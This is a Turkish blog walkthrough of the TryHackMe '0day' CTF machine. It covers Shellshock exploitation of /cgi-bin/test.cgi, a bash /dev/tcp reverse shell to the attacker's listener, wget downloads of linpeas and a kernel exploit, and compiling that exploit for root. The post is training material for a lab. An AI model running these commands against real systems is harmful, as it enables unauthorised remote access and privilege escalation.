Siber Güvenlik Portalı

  1. Anasayfa
  2. »
  3. CTF ÇÖZÜMLERİ
  4. »
  5. Tryhackme 0day Makine Çözümü

Tryhackme 0day Makine Çözümü

Siber Güvenlik Portalı Siber Güvenlik Portalı - - 4 dk okuma süresi
110 0
0day Makine Çözümü pp

Merhaba! Bu yazıda, TryHackMe 0day Makine Çözümü nü adım adım birlikte gerçekleştireceğiz. Eğer siber güvenlik alanında pratik yapmak ve bilgi seviyenizi artırmak istiyorsanız, bu rehber tam size göre!

1- İlk adımda, Rustscan aracıyla hedef sistemde açık portları tespit ediyoruz. Bu araç, hızlı tarama performansıyla bilinir.

Açık portlar: 22 ve 80
Alternatif olarak şu komutu kullanabilirsiniz:

nmap -sS -sV -sC -Pn hedef makine adresi olarak tarayabilirsiniz. Rustscan aracı hızlı ve etkili olması ile öne çıkıyor.

Tryhackme 0day Makine Çözümü

2- Gobuster ile tarama yaparak çeşitli dizinler tespit ettik ancak işe yarar bir içerik bulamadık. Ardından Nikto ile daha detaylı bir web sunucusu analizi yaptık

Tryhackme 0day Makine Çözümü

3- Nikto taramasında, /cgi-bin/test.cgi dizininde Shellshock açığı bulundu. Bu açık, eski Apache sunucularında kritik bir zafiyet olarak bilinir. Şimdi bunu kullanarak sisteme erişim sağlamaya çalışacağız.

Tryhackme 0day Makine Çözümü

4- Searchsploit içerisinden detaylı araştıyorum ve 1 tane python ile yazılmış exploit buluyoruz.

searchsploit -m linux/remote/34900.py indiriyoruz.

İlginizi çekebilecek yazımız: Bilgisayar Korsanları MacOS Kullanıcılarına Siber Saldırılar Düzenliyor

Tryhackme 0day Makine Çözümü

5- python3 34900.py payload=reverse rhost=hedefmakineipadresi lhost=kendivpnlocalipadresiniz lport=9001 && ncat -lvnp 9001 olarak dinleme başlıyoruz.

&& ncat -lvnp 9001 yaparak daha pratik kullanım sağlayabilirsiniz. Tek terminal de hem aracı çalıştırdık hem de geri bağlantıyı elde etmiş olduk.

Sorguladığımızda www-data olarak makindeyiz, şimdi shell ile direkt farklı terminal içerisine geçiş yaparak bash olarak kullanacağız.

Tryhackme 0day Makine Çözümü

6- ncat -lvnp 4444 diyerek diğer dinlemeyi de başlattık.

Tryhackme 0day Makine Çözümü

7- bash -i >& /dev/tcp/vpnipadresiniz/4444 0>&1 olarak onayladığımızda diğer ncat içerisine bağlantı gidecektir.

8- Bağlantı geldi ve cat /home/ryan/user.txt yaparak ilk bayrağı tespit etmiş olduk.

Şimdi Linpeas.sh ile yetki yükseltmek için yollar arayacağız.

9- Öncelikle python3 -m http.server 80 yazarak kendi makinemizde http serverı etkinleştirdik.

10-  Direkt Buraya Tıklayarak İndirin makinemize Masaüstüne Linpeas.sh indiriyoruz.

  • cd /tmp/
  • wget localipadresiniz/linpeas.sh
  • chmod +x linpeas.sh
  • ./linpeas.sh yaparak araştırma yapmaya başladık.

11- Baktığımızda Linux sunucusunda çok eski bir versiyon olduğunu tespit etti. Google’da aratarak uygun exploit arıyorum.

12- Evet bir tane yetki yükseltmek için yazılmış exploit bulduk. Tıklayarak masaüstüne indiriyoruz.

13- Sırasıyla;

  • wget localipadresiniz/37292.c olarak makineye indirdik
  • export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin
  • gcc 37292.c -o exploit.
  • ./exploit

artık root içerisindeyiz.

14- Root içerisindeyiz. cat /root/root.txt diyerek ikinci bayrağı da aldık, makinemizin sonuna gelmiş bulunuyoruz.

Tryhackme 0day Makine Çözümü  sonuna geldik, yeni yazılarda görüşmek üzere sağlıcakla kalın…

İlgili Yazılar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir